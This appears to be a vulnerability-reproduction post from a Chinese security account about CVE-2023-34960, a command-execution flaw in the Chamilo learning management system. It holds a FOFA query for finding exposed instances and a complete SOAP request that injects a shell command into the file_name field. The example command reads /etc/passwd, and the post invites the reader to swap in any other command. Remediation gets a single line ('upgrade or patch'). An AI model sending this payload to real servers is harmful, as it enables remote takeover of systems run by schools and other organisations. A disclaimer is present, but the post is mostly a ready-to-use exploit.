Command Execution Vulnerability in Chamilo Learning Management Software (CVE-2023-34960)
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to Chamilo Learning Management Software
WeChat official account search: Nanfeng Vulnerability Reappearance Library This article was first published on the Nanfeng Vulnerability Reappearance Library official account
Chamilo is a free downloadable learning management software that aims to improve the accessibility of online courses for users from disadvantaged backgrounds. Chamilo is run and managed by a non-profit organization called the Chamilo Association.
2. Vulnerability description
Chamilo is a free downloadable learning management software that aims to improve the accessibility of online courses for users from disadvantaged backgrounds. Chamilo is run and managed by a non-profit organization called the Chamilo Association. There is a command execution vulnerability in Chamilo, malicious attackers can control the server with arbitrary commands through the constructed xml file.
CVE number: CVE-2023-34960
CNNVD number:
CNVD number:
3. Affect the version
Chamilo
4. fofa query statement
app="Chamilo"
5. Vulnerability recurrence
Vulnerability link: https://www.xxx.com/main/webservices/additional_webservices.php Vulnerability data package:
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 826
Content-Type: application/x-www-form-urlencoded
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{http://ip:port}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
Execute the cat /etc/passwd command, or replace the command with another command
6.POC&EXP
Follow the official account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 37 to get the download address of the POC tool:
7. Rectification opinions
Upgrade to latest version or patch
8. Past review
Hikvision iVMS Integrated Security System Arbitrary File Upload Vulnerability Reappears
Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)